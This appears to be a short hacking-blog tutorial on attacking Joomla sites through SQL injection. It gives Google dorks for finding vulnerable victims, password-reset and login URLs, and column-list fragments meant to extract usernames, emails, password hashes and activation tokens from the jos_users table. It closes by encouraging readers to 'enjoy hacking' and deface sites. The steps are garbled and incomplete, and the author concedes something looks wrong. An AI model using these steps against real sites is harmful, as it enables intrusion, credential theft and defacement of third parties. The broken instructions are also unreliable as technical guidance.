INFORMATION :-
Copy & Paste - /index.php or Change --> Example that have been changed (0x3a,username,0x3a,email,0x3a,activation)
just on url address of victim site.
Steps :
  1. Find any site with ERROR (www.Google.com) - inurl:jos_users" inurl:"index.php
  2. To make you are just like forgot password. - /index.php?option=com_user&view=reset
  3. Its Find E-Mail - (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
  4. Its Find Username - (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
  5. Its Find Admin Profile - (username,0x3a,password)
  6. Its Find Token - (0x3a,username,0x3a,email,0x3a,0x3a,activation)
  7. Its Find Login/Outlogin - index.php?option=com_user&view=login
* inurl:"option=com_juser"
* its find error sites, Some Site :-
- (0x3a,username,0x3a,email,0x3a,0x3a,activation)
- (0x3a,username,0x3a,email,0x3a,activation)


Happy trying and enjoy hacking. :)


P/S - From the steps or procedures, it is look like something wrong... anyway, give me a comment if there is a problem in defacing joomla site. So i can make a new tutorial for joomla hacking tricks.

0 comments

Post a Comment

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Popular Posts

Networked Blog

Follow Me